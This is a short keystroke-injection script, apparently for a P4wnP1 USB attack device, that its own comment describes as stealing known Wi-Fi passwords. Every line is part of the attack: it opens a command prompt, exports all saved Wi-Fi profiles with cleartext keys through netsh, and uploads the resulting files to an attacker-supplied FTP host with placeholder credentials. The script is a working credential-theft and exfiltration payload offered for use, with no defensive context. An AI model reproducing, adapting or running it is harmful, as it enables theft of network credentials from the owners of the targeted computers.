//script that steals known wifi passwords and uploads them to a ftp server
layout('it');			
typingSpeed(50,0);
//waitLEDRepeat(NUM);		
press("GUI r");
delay(500);
type("cmd");
press("RETURN");
delay(1000);
type("cd C:\\");
press("RETURN");
delay(500);
type("md p4wnpi");
press("RETURN");
delay(500);
type("cd p4wnpi && @netsh wlan export profile key=clear >nul");
press("RETURN");
delay(2000);
type("ftp -i $YOURHOST");
press("RETURN");
delay(500);
type("$FTPUSERNAME");
press("RETURN");
delay(500);
type("$FTPPASSWORD");
press("RETURN");
delay(500);
type("mput *.xml");
press("RETURN");
delay(4000);
type("bye");
press("RETURN");
delay(500);
type("exit");
press("RETURN");
delay(500);
